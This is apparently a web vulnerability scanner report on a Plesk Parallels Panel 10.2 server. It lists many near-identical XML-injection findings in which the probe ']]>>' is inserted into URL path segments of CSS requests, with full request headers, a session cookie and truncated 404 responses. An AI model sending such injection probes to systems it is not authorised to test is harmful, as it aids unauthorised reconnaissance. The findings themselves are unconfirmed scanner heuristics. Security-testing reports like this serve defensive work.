Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk]]>>/css/main/buttons.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:13 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/buttons.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css]]>>/main/buttons.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:15 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/buttons.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/main]]>>/buttons.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:17 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/buttons.css
Issue detail
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/main/buttons.css]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:19 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/custom.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/plesk/css/main/custom.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:22 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/custom.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/plesk/css/main/custom.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:24 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/custom.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk]]>>/css/main/custom.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:26 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/custom.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css]]>>/main/custom.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:27 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/custom.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/main]]>>/custom.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:29 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/custom.css
Issue detail
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/main/custom.css]]>>?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:31 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/desktop.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/plesk/css/main/desktop.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:18 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/desktop.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/plesk/css/main/desktop.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:20 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/desktop.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk]]>>/css/main/desktop.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:22 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/desktop.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css]]>>/main/desktop.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:24 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/desktop.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/main]]>>/desktop.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:26 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/desktop.css
Issue detail
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/main/desktop.css]]>>?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:28 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/plesk/css/main/double-list-control.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:06 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/plesk/css/main/double-list-control.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:08 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk]]>>/css/main/double-list-control.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:09 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css]]>>/main/double-list-control.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:11 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
